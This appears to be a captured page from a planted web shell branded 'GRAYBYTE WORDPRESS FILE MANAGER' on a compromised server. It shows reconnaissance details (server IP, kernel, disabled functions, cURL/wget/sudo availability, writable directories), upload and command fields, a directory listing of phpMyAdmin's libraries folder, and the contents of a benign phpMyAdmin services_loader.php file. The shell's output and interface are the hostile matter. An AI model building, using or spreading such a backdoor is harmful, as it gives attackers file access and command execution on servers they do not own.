GRAYBYTE WORDPRESS FILE MANAGER4538

Server IP : 3.104.188.249 / Your IP : 216.73.217.141
System : Linux ip-172-26-1-242 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
PHP Version : 8.3.31
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF
Directory : /usr/share/phpmyadmin/libraries/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/share/phpmyadmin/libraries//services_loader.php
<?php

declare(strict_types=1);

namespace Symfony\Component\DependencyInjection\Loader\Configurator;

use Symfony\Component\DependencyInjection\Reference;

use function is_string;
use function substr;

return static function (ContainerConfigurator $configurator): void {
    $services = $configurator->services();
    $loadServices = static function (array $servicesFile, ServicesConfigurator $services): void {
        foreach ($servicesFile['services'] as $serviceName => $service) {
            if (is_string($service)) {
                $services->alias($serviceName, $service);
                continue;
            }

            $theService = $services->set($serviceName, $service['class'] ?? null);
            if (isset($service['arguments'])) {// !== null check
                foreach ($service['arguments'] as &$argumentName) {
                    if ($argumentName[0] !== '@') {
                        continue;
                    }

                    $services->alias($serviceName, substr($argumentName, 1));
                    $argumentName = new Reference(substr($argumentName, 1));
                }

                $theService->args($service['arguments']);
            }

            if (! isset($service['factory'])) {
                continue;
            }

            // !== null check
            $theService->factory($service['factory']);
        }
    };

    $servicesFile = include ROOT_PATH . 'libraries/services.php';
    $loadServices($servicesFile, $services);
    $servicesFile = include ROOT_PATH . 'libraries/services_controllers.php';
    $loadServices($servicesFile, $services);
};

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 27 2026 03:19:02
root / root
0755
cache
--
May 27 2026 03:19:02
root / root
0755
classes
--
May 27 2026 03:19:02
root / root
0755
advisory_rules_generic.php
36.041 KB
February 07 2023 21:35:12
root / root
0644
advisory_rules_mysql_before80003.php
6.186 KB
February 07 2023 21:35:12
root / root
0644
config.default.php
70.956 KB
February 07 2023 21:35:12
root / root
0644
config.values.php
13.168 KB
February 07 2023 21:35:12
root / root
0644
constants.php
1.881 KB
February 07 2023 21:35:12
root / root
0644
language_stats.inc.php
1.625 KB
February 07 2023 21:35:12
root / root
0644
routes.php
19.5 KB
February 07 2023 21:35:12
root / root
0644
services.php
7.687 KB
February 07 2023 21:35:12
root / root
0644
services_controllers.php
65.168 KB
February 07 2023 21:35:12
root / root
0644
services_loader.php
1.588 KB
February 07 2023 21:35:12
root / root
0644
vendor_config.php
2.072 KB
April 08 2025 15:25:51
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF